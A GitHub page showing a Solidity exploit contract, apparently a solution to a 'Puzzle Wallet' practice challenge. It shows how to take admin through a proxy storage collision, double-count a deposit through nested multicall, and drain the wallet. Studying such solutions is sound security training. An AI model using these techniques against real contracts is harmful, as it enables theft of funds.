-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit_puzzelwallet.sol
61 lines (43 loc) · 1.89 KB
/
exploit_puzzelwallet.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface IWallet {
function admin() external view returns (address);
function proposeNewAdmin(address _newAdmin) external;
function addToWhitelist(address addr) external;
function deposit() external payable;
function multicall(bytes[] calldata data) external payable;
function execute(
address to,
uint256 value,
bytes calldata data
) external payable;
function setMaxBalance(uint256 _maxBalance) external;
}
contract PuzzleSolver69000 {
IWallet public wallet;
bytes deposit = abi.encodeWithSignature("deposit()");
// bytes multideposit =
// abi.encodeWithSelector(wallet.deposit.selector, deposit);
constructor(address _wallet) {
wallet = IWallet(_wallet);
wallet.proposeNewAdmin(address(this));
wallet.addToWhitelist(address(this));
}
function moneyGlitch() public payable {
bytes[] memory glitch = new bytes[](1);
glitch[0] = abi.encodeWithSelector(wallet.deposit.selector);
bytes[] memory exp = new bytes[](2);
exp[0] = glitch[0];
exp[1] = abi.encodeWithSelector(wallet.multicall.selector, glitch);
wallet.multicall{value: 0.002 ether}(exp);
wallet.execute(msg.sender, 0.003 ether, "0x00");
}
function solve() external {
wallet.setMaxBalance(uint256(uint160(msg.sender)));
require(wallet.admin() == msg.sender, "fuck this");
}
receive() external payable {}
fallback() external payable {}
}
//exp[] value:
//["0xd0e30db0","0xac9650d80000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000004d0e30db000000000000000000000000000000000000000000000000000000000"]